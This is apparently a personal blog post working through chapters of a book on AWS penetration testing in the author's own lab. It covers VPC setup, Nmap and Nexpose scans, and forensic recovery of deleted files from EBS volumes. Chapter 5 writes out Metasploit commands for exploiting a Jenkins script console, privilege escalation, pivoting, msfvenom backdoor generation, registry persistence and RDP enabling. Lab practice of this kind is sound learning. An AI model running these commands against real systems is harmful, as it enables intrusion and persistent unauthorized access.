Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 4 – Setting Up Your First EC2 Instances
First thoughts…didn’t we just set up EC2 instances? I think the point is we’re about to start customizing things. I am curious if I need to keep the existing EC2 instances or if they can be terminated.
Search the AWS Marketplace for Ubuntu, pick the latest available AMI, pick the free tier, then configure VPC and Subnet. Fun!
- Click “Create new VPC”
- Click “Create VPN” – name, IPv4 block (10.0.0.0/16 for the book)
- Click “Create”
Now create a subnet…
- Click “Subnets” in the left menu frame (you should still be in the VPC dashboard)
- Give it a name, pick the new VPC
- Pick the CIDR block (10.0.1.0/24 for the book)
- Pick the option to auto-assign a public IPv4
- Click “Create”
Go back to the “Launch instance wizard” (probably in another tab) and refresh the Network option. Pick the new VPC and it should auto select the subnet. That part goes smoothly but (hat tip to Jetson23), but you have to add an Internet Gateway to the subnet if you actually want to access it. At least that is how it worked for me and how it seems from the AWS VPC docs. It’s not that complicated, but would leave you potentially chasing your tail trying to connect. My instance brought up in the VPC and subnet with IPv4 auto-assignment enabled wouldn’t connect until I added the IGW – then connecting was no problem.
Add more storage – recommended is EBS, 40 GB, general purpose (gp2), and select delete on termination. That seems like a really big volume to add for a lab. The gp2 blocks are currently $0.10 (US) per GB per month. So with the 8 GB for each Ubuntu (16), 25 GB for Kali, and 30 GB for Windows, our root storage will run about $7.00 a month. Not a huge number, but I can see how it could easily get up there. I don’t see a good reason to add 40 GB…ok, so reading on, it looks like the whole point of this is practice. So I skipped it. I had some concerns about whether the previously created instances needed to be on the new VPC, but I determined that wasn’t necessary.
There was some good background info about AWS in this chapter, so that was helpful. Otherwise, kind of a repeat of setting up instances. The VPC and subnet customization had some issues. Not sure if AWS changed how those were processed between the time of writing and now, but the documentation from AWS is decent so it wasn’t too much of an issue. I am doing the AWS Cloud Practitioner Essentials free course and had just watched the AWS Core Services module, so that may have made it less confusing. Checking out the available AWS training might be beneficial.
Ch 5 – Penetration Testing of EC2 Instances using Kali Linux
Reading this chapter initially had me side-eyeing things because it talked about installing Jenkins on a Linux VM. Then talked about installing it on a Windows 2008 box. What is actually going to happen is Jenkins will run on the Windows instance, then there will be an Ubuntu instance that is only accessible via the Jenkins machine (and SSH because you do want to make sure you can access it if necessary).
Installing Jenkins on Windows
Back to the Windows 2008 instance created in section 1. (I did terminate the Ubuntu instance I made earlier so I can make a new one later in this section. No real reason other than I can.) Download Jenkins, extract, install. Set up the user and start the service. Use the instance’s private IP. You should be taken to a login page once you finish.
The book says to verify access from Kali by creating an SSH tunnel to the Kali machine with PuTTY. I guess that means PuTTY from the 2008 instance to Kali and use port-forwarding on 8080. I didn’t think that was necessary, so I just got into RDP using Guacamole and verified I could browse to the Jenkins login page.
Setting up a target VM behind Jenkins
Spin up a new Ubuntu 18.04 instance – if you are making a new one, be sure to pick the same region, VPC, and subnet that you’ve been using. Adjust your security rules to allow access via SSH just in case you need it and allow all traffic from the Windows Jenkins machine. The book says to do so using the security group ID. That works well enough.
Setting up Nexpose
This was a pain. Nexpose is now InsightVM (still Rapid7). You need a company email, which just really irritates me. Don’t get me wrong – I like a lot of what Rapid7 does and think they have some pretty good stuff. Just bothers me that to test the product you have to essentially be worth calling. I understand the purpose, and I can’t really disagree with it. But I’m a fan of getting at least some version of your tool in people’s hands so they decide it’s worth using. I’m not sure if this was the case when the book was written, but I like to see things like this mentioned.
But I digress…
Jump through hoops, download, install. Make sure to
chmod to allow the file to execute and then be logged in as root to execute. An important note is to add the
-c option at the end of the install command.
chmod +x Rapid7Setup-Linux64.bin ./Rapid7Setup-Linux64.bin -c
My Nexpose wasn’t running, so I uninstalled. Went to reinstall and errored out because of lack of space. I’m wondering if trying to run Nexpose was consuming all my resources.
Create volume (I picked 100 GB so I would have more than the recommended 80 GB), attach, format.
lsblk file -s /dev/xvdf mkfs -t ext4 /dev/xvdf mkdir /<nameofstorage> mount /dev/svdf /<nameofstorage>/
Nexpose also recommends a minimum of 8 GB RAM, so looks like I’ll be installing then shutting the instance down to add some resources. Based on how my Kali instance was acting, I think the demands were overrunning the compute power. Bumped it up to a t2.large to test since that (almost) has the recommended RAM. With the t2.large, I was able to get running.
I’m pretty comfortable with Nmap, at least for basic recon. I stepped through the scans because it doesn’t hurt to do so. Plus I needed to let Nexpose initialize…
sudo nmap -sn 172.31.0.0/20 #Decided this was going to take too long and switched to sudo nmap -sn 172.31.32.0/24 #because that's where my stuff was sudo nmap <WindowsPrivateIP> #Basic scan sudo nmap -T4 -p- <WindowsPrivateIP> #Scan all the ports sudo nmap -v -p <port_list_comma_separated> -sV <WindowsPrivateIP> #Get port services
Basically, Nexpose is like Nmap on steroids – host discover, port scanning, service discover, OS fingerprinting, vulnerability checks, brute force attacks (careful with that one), policy checks, and reports. I haven’t worked with Nexpose before so this part was interesting. Lots of scan options, including one for CIS. I can see some possibilities for the product poking around the dashboard.
I was able to run Nmap and Nexpose at the same time without overloading my instance, so that’s a good sign. Hopefully I’ll have time to work with Nexpose a bit more during the trial period. I am hoping we’ll come back to it later in the book, but it doesn’t look like it. (Having the Kindle version comes in handy sometimes.) I think you could skip the Nexpose install if you aren’t interested in it. Kind of seems like a waste of a trial to just scan 1 thing.
Exploit Jenkins with Metasploit
For the most part, this was just follow along with the book. The only difficulty I ran into was the
reverse_tcp payload didn’t work. There are a ton of payloads, and since the next part used metepreter, I wanted to use a meterpreter payload, I gave
bind_tcp a shot and it worked. I was able to get root/admin on the Windows server and access the Ubuntu instance.
msfconsole search jenkins use exploit/multi/http/jenkins_script_console set RHOSTS <WindowsIP> set RPORT 8080 set USERNAME admin set PASSWORD admin set TARGETURI / set target 0 #To indicate Windows show payloads #Optional set payload windows/x64/meterpreter/reverse_tcp #Didn't work for me set payload windows/x64/meterpreter/bind_tcp #Worked for me set LHOST <KaliIP> #Book accidentally calls this LPORT run
If all goes well, you’ll have a meterpreter shell. When I used the
reverse_tcp payload, the exploit executed, but I didn’t get a shell. Switching to
bind_tcp got a meterpreter shell. Then on to digging around on the Windows machine…
sysinfo #Check out the system information getsystem #Get admin on Windows systems, fantastic Metasploit feature getuid #Confirm admin background route add <targetIP> <subnetmask> <meterpreter_session> use auxiliary/scanner/portscan/tcp set RHOSTS <UbuntuIP> run
Hopefully you’ll see the 22 port for SSH and a few others. The auxiliary scanner took a good amount of time. Like forever. Scanning 10000 ports in a single thread is going to take time though. And since I always forget how to bring a session back up, here’s the SAN’s Metasploit Cheat Sheet.
background #Sends a session to background, will tell you session id in the response Backgrounding session 1... #Result of background sessions -l #List all background sessions session -i <ID> #Back to the session
The route addition shown in the books is a little unclear. I wasn’t sure what was meant by the target IP. Another good resource for msfconsole commands is from Offensive Security. Based on this, I modified the route command:
route add 172.31.32.0/20 1
And still got nothing but 22. I logged into my Ubuntu box – and found out nothing was running except 22/ssh, so no wonder I wasn’t getting anything. I did a quick install of vsftpd and verified I could get there.
Moving on to persistence…I stuck with
bind_tcp since it worked for me. In actual an actual pen test, I wouldn’t use 4444 since that’s the Metasploit default, but fine for these purposes.
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<KaliIP> LPORT=4444 -f exe -o /tmp/evil.exe #All one line sessions -i <sessionID> run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXNAME=default.exe STARTUP=USER LocalExePath=C:\\tmp reboot exit #To exit meterpreter session
Prep for the incoming connection after reboot:
use multi/handler set PAYLOAD windows/x64/meterpreter/bind_tcp set LHOST <KaliIP> set LPORT 4444 run
Wait for the check-in…and hopefully all is good. I got an error when I tried to reboot – using reboot and shutdown were hit and miss within meterpreter. My check-in never came. I checked the Windows box, and the file was there but not the registry key. So time to get a little creative…
I adjusted the execution of the exploit to use
STARTUP=SYSTEM instead of user since looking at the options, system looked like a better option for this situation. Looking at pentestlab’s blog gave me this idea and a few others to try. Lots of playing around with this, and while I was able to get the file installed and registry keys created, I wasn’t getting the check-in.
I tried this part using
reverse_tcp to reduce differences from the book, but while I found the file and the registry key, no luck on the check-in. I RDP-ed into the Windows box and did see an error that
default.exe stopped working, so I think it tried to check-in, but the
reverse_tcp option wasn’t working. So tried
bind_tcp instead. I still had my RDP session up, and no reboot. I rebooted manually to test the persistence…default.exe got another error and no check-in.
I did some more searching and testing because I wanted to have a way to get persistent access that didn’t rely on the Jenkins exploit. I found an article on Hacking Articles – Raj Chandel’s Blog with a bunch of ways to get persistence on Windows 10. Since this site usually has good info, I started working through the options. I wasn’t having much luck. The RDP exploit looked interesting…and since nothing else worked, why not? The suggested method did not work – it errored out with a note that Meterpreter scripts are deprecated, try
post/windows/manage/enable_rdp, and insufficient privileges.
So I used
getsystem to deal with the privilege issue and then tried the
post/windows/manage/enable_rdp option. I basically repeated the module until I got it to accept my options. My password was too weak, then it was too long, then it didn’t like the username, but finally I got it to go through.
use post/windows/manage/enable_rdp set ENABLE true #Didn't change set FORWARD false #Didn't change set LPORT 3389 #Didn't change set PASSWORD <password> #Trial and error until you get something accepted set SESSION <sessionID> set USERNAME <username> #Trial and error until you get something accepted
I’m curious is part of the difficulties I was having related to using a CIS issued AMI. Which really, why did I have to pick an imaged that was hardened? More fun that something that is wide open I guess.
This was a bit of a frustrating chapter. Some sort of superfluous stuff, though the info is good. I wish labs would go smoothly, but they rarely do unless you are working in a built environment (which is why I really like being able to do labs in things like Learn on Demand or Practice Labs). It’s hard to say if the changes to Nexpose/InsightVM were before or after the authors wrote the book. Plus I know when you are writing out labs, you may be using an existing environment and not really notice with version of something you are using. I’m curious to hear if others are able to run Nexpose with a t2.medium size. I might have been able to fight with it more and get it to work, but in the interest of time, I’m good with upping the size and adding an Elastic Block Store. It did seem to blip the first time I installed, but after blowing away the initial EBS and creating a new one, I was able to get through the Nexpose part. The Jenkins exploit and pivoting was good except for persistence. But it was good to look at some other options for persistence.
Ch 6 – Elastic Block Stores and Snapshots – Retrieving Deleted Data
I was excited about the lab for this chapter. I’ve been wanting to get more experience with digital forensics, so yay. Lots of background on EBS. Some repetitive, but not a big deal. Good info on digital forensics and intro to how/why this works. And then the wheels fell off.
Create small EBS, attach to Ubuntu, ssh in, format, make file, delete file, detach, and detach at EC2 level.
lsblk sudo file -s /dev/<partitionID> #Check for existing data sudo mkfs -t ext4 /dev/<partitionID> #Format sudo mkdir /<directoryformount> sudo mount /dev/<partitionID> /<directory/ cd /<directory> df -h . #Check size sudo touch data.txt sudo chmod 666 data.txt echo "Hello World" > data.txt sudo rm -rf data.txt #Delete cd / #Get out of the partition sudo umount -d /dev/<partitionID> #Unmount
Attach to Kali and get to work…and that didn’t go according to plan. I was able to see the inode for the deleted file using
fls, but no results came through in
sudo lsblk #ID partition sudo mmls /dev/<partitionID> #Check filesystem - did not find type sudo fls -o <OFFSET> /dev/<partitionID> #Use start sector address to list files sudo fls -o <OFFSET> /dev/<partitionID> <inode_of_file> #Get inode? sudo icat -o <OFFSET> /dev/<partitionID> <inode_of_file> > /tmp/data #Recover cat /tmp/data #Theoretically shows file
Since that didn’t work, I went digging. Going through the wiki on file recovery for TSK, I was at least able to get more data on the partition. The
mmls command returned unable to determine filesystem. Using
fsstat gave all kinds of information. I was able to get the list of files using
fls with no issue. Messed around quite a bit, and still could not get anything recovered. So I decided to delete that block and try again. At least I got more familiar with tools available in TSK.
Made another EBS, attach, format, mount, create, delete, unmount, detach, attach to Kali. And tried another recovery method…
blkls /dev/<partitionid> > /filepath/<name>.blkls #This will take some time strings -t d /filepath/<name>.blkls > /filepath/<name>.blkls.str #Pull all the strings, also going to take a bit grep "Hello" /filepath/<name>.blkls.str | less #Look for what you are looking for
Well, that at least returned something…a number and the desired string (“Hello World”). That got what I wanted to see. I went ahead and did a few other parts of the walkthrough to see what I could see.
fsstat -t ufs /dev/<partitionid> #To figure out what fragment dd if=/dev/<partitionname> bs=<blocksize> skip=<numberfromgrep/blocksize> count=1 | less #That gave me a lot of ^ and @ blkcalc -u <numberfromgrep/blocksize> /dev/<partitionid> #Returns fragment blkcat /dev/<partitionid> <fragment> | less #That gave me Hello World plus a lot of ^ and @.
That part would have helped find information had I not been looking for something specific. I think with this approach you could step through re-creating files. That will have to wait for a more forensics focused lab though.
I decided to give Autopsy a quick try…because why not? Using our previously setup Guacamole tunnel, pop up an RDP session, and start Autopsy. Clicking through the basic setup, I could once again see the file but not the contents. Taking what I had learned using the CLI, I was able to go to the Data Unit analysis option, use the fragment number I found from
grep, use the “Unallocated (blkls)” Address Type, and display “Hello World”. I poked around the various options in Autopsy just to see what I could see. Interestingly the inode allocation list listed 12 as free, so that may be why the issues with
icat were happening. I had some stability issues in Guacamole, so keeping the large instance size might be a good idea if you want to use RDP via Guacamole much. Or add a tunnel for Autopsy to make your life easier – that’s the route I would go if I wanted to do more investigating.
From this older post, it looks like ext3 and ext4 clear inode information differently than ext2, and that may be why
icat wasn’t sufficient to recover the file, but going to the block did (because the pointers between inode and the blocks were zeroed out). The
ext4magic in Ubuntu looks like an interesting option and has info about why recovering on ext3/4 is not an easy process. But it’s not a default package on Kali, and I think I’ve (almost) chased enough rabbits for this section. So filing that away and moving on. After I pop up an EBS with ext2 to see if everything works easier. Because reasons.
With ext2, still no
icat result. I’m not sure where the disconnect was between what I was finding and the book instructions. When the file had not been deleted, using the inode and
icat worked wonderfully. But that’s not particularly helpful. More digging because I’m stubbornly determined to get
icat to work. And I found a walkthrough that based on what I’ve learned so far makes sense and might work.
sudo fsstat /dev/<partitionID> | less #To pull details and block size sudo dd if=/dev/<partitionID> of=/filepath/<partitionID>.img.dd bs=4096 #Create image sudo img_stat /filepath/<partitionID>.img.dd sudo mmls <partitionID>.img.dd #Still undetermined, b/c this doesn't do ext sudo fls <partitionID>.img.dd #Got the same inode number I have been sudo istat <partitionID>.img.dd <inodeNumber> #Details, lists inode as 'Not Allocated' sudo icat -o <offset> -r <partitionID>.img.dd <inodeNumber> > /tmp/data.txt
And more not working. Looking at this presentation from a SANS summit, it looks like my setting is showing the file size as 0 rather than non-zero when I check it with
ils. That seems to be why I’m not able to recover the files using these methods. I thought it might have something to do with switching the EBS between instances, but even deleting the file while mounted to Kali resulted in a file size of 0. I’m wondering if something in ext2 or mkfs was updated to make deleting file in an ext2 file system zero out the records. At this point, I’m willing to move on. I learned a lot (though a drop in the bucket in the overall scope) about digital forensics and file systems. It looks like file recovery might be easier on some other file system types, so at some point I’ll probably add an EBS to the Win 2008 instance and try to recover deleted files from that.
I’m definitely comfortable creating, attaching, detaching, and deleting Elastic Block Stores now. Nexpose/Insight looks pretty cool. Hopefully I’ll get some time to test that out some more before it expires. The recovery lab was way more complicated than it should have been for some reason. Lab costs for this section were less than $4.00 (US). Since I bumped up to a t2.large for a bit and add a 100 GB EBS for Nexpose, my costs spiked a bit. Plus all the EBS I created for short times and deleted. I’ll leave the 100 GB EBS while I have Nexpose, but I’ll drop that to reduce cost more than likely since there’s not a good reason to keep it. I want to keep looking into The Sleuth Kit and digital forensics. I’m also very curious to see if others run into similar issues with the Jenkins exploit and file recovery. I can think of multiple variables with each to test, but for now, I need to focus on moving forward in the book and doing the other things that need to get done.